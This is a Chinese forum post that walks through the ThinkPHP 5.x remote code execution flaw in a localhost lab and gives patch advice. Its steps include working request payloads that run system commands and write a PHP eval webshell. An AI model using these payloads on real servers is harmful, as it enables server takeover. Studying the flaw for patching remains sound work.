| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1519 人关注过本帖
标题:ThinkPHP远程代码执行漏洞
只看楼主 加入收藏
源哥
Rank: 1
等 级:新手上路
帖 子:15
专家分:0
注 册:2019-9-5
收藏
 问题点数:0 回复次数:0 
ThinkPHP远程代码执行漏洞
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架。
 
Thinkphp5.x版本中存在一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令
 
影响范围
 
Thinkphp 5.1.0 - 5.1.31
 
Thinkphp 5.0.5 - 5.0.23
 
漏洞利用
 
环境介绍:
 
thinkphp5.0.22+php5.4.45+ apache2.4.23
 
1.首先搭建好相应的环境,页面访问如下:
 
图片附件: 游客没有浏览图片的权限,请 登录注册

 
2.当看到框架为thinkphp5.x时,我们需要的就是验证是否存在远程代码执行漏洞
 
http:// localhost/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
图片附件: 游客没有浏览图片的权限,请 登录注册

3.确认此处存在远程代码执行后,写入shell
 
http:// localhost/public/index.php?s =index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php eval(@$_POST['a']); ?>
 
图片附件: 游客没有浏览图片的权限,请 登录注册

4.尝试用菜刀进行连接,连接成功
图片附件: 游客没有浏览图片的权限,请 登录注册

当然这里我们也可以选择直接上传大马
图片附件: 游客没有浏览图片的权限,请 登录注册

相比手工,我们也可以选择工具直接getshell都是可以的
图片附件: 游客没有浏览图片的权限,请 登录注册

修复建议
1、打补丁:
Thinkphp v5.0.x补丁地址:
https://
Thinkphp v5.1.x补丁地址:  
https://
2、更新框架版本
 
参考链接
 
exploit地址:
 
https://www.
 
框架下载地址:
 
http://www.
 
docker漏洞环境源码:
 
https://
搜索更多相关主题的帖子: 框架 漏洞 代码 远程 执行 
2019-09-12 14:07
快速回复:ThinkPHP远程代码执行漏洞
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.017529 second(s), 9 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved